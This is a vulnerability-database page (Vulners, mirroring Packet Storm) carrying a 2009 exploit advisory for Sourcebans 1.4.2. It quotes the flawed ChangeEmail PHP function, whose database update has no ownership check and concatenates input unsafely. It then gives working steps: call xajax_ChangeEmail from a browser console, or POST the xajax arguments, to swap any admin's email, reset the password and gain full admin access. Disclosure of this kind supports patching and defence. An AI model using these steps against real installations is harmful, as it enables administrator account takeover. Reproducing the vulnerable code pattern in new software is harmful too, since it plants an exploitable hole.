Lucene search
K

Sourcebans 1.4.2 Change Admin E-Mail

🗓️ 23 Jun 2009 00:00:00Reported by Mr. AnonymousType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Exploit allows unauthorized email change for admin accounts in Sourcebans 1.4.2 without verification.

Code
`Sourcebans (PHP) (sb-callback.php)  
Author: Mr. Anonymous  
------  
Vendor:http://www.sourcebans.com  
Affected Versions: <= 1.4.2  
-----  
Exploit (sb-callback lines 185-204):  
-------------  
function ChangeEmail($aid, $email)  
{   
...SNIP...  
  
$GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` =  
'".$email."' WHERE `aid` = '".$aid."'");  
$objResponse->addScript("ShowBox('E-mail address changed', 'Your  
E-mail address has been changed successfully.', 'green',  
'index.php?p=account', true);");  
$log = new CSystemLog("m", "E-mail Changed", "E-mail changed for  
admin (".$aid.")");  
return $objResponse;  
}  
-------  
How to Exploit  
-------  
No checking is done to verify you own that email address. You can  
simply submit a post request with the following arguments, to change  
any admins email with your own (or a temporary one), and then reset  
their password, then get full admin access.  
  
You can download firebug for firefox, and simply run in the console  
"xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need  
to send these variables to index.php via POST:  
  
xxajax: ChangeEmail  
xajaxargs[]: ADMIN_ID  
xajaxargs[]: EMAIL_TO_CHANGE_TO  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jun 2009 00:00Current
7.4High risk
Vulners AI Score7.4
17